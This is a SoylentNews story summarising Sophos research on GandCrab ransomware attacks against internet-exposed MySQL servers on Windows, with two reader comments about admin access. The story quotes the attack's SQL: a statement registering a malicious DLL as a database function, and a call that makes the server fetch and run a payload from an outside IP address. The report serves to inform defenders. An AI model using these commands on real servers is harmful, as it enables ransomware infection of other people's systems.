Stories
Slash Boxes
Comments

SoylentNews is people

Internet Accessible MySQL Databases Targeted by GandCrab Ransomware

posted by Fnord666 on Monday May 27 2019, @09:13PM   Printer-friendly
from the don't-do-that dept.

RandomFactor writes:

Sophos has uncovered a wave of attacks targeting servers running MySQL on Windows.

The attack delivers the GandCrab ransomware.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the "set" command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server's plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.

Tracking back through the attack chain, the researchers determined that the malware was downloaded from the source ~3100 times since mid April. Each download potentially indicating an infection, although presumably some were, as in Sophos' case, honeypots where no actual damage was done. The user interface of the system (geolocated in Arizona) hosting the malware is in simplified Chinese.

While not a widespread attack by numbers, it does represent a significant risk to MySQL databases exposed online.

Detailed Analysis

Original Submission

 
This discussion has been archived. No new comments can be posted.
Internet Accessible MySQL Databases Targeted by GandCrab Ransomware | Log In/Create an Account | Top | 15 comments | Search Discussion
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

  • (Score: 5, Interesting) by The Mighty Buzzard on Monday May 27 2019, @11:05PM (1 child)

    by The Mighty Buzzard (18) Subscriber Badge <themightybuzzard@proton.me> on Monday May 27 2019, @11:05PM (#848312) Homepage Journal

    There's a big difference between giving IT staff full root on every box and every service without authentication and sanity though. Even ultra all-systems, all-services admins shouldn't default to having the keys to the kingdom from logging in to one box. I'd have to authenticate three different ways and ssh in from another SN server to monkey with the SN database with enough perms to do something like this (were we running windows so it was possible) when I've got keys to everything but the money. And we don't even put any serious brain power into figuring out how to better secure things here unless we're just bored and feel like doing so.

    --
    My rights don't end where your fear begins.
    Starting Score:    1  point
    Moderation   +3  
       Interesting=3, Total=3
    Extra 'Interesting' Modifier   0  
    Karma-Bonus Modifier   +1  
    Total Score:   5  

  • (Score: 0) by Anonymous Coward on Tuesday May 28 2019, @07:58AM

    by Anonymous Coward on Tuesday May 28 2019, @07:58AM (#848434)

    And we don't even put any serious brain power into figuring out how to better secure things here unless we're just bored and feel like doing so.

    You have to have something in the frist place to put that something into, no?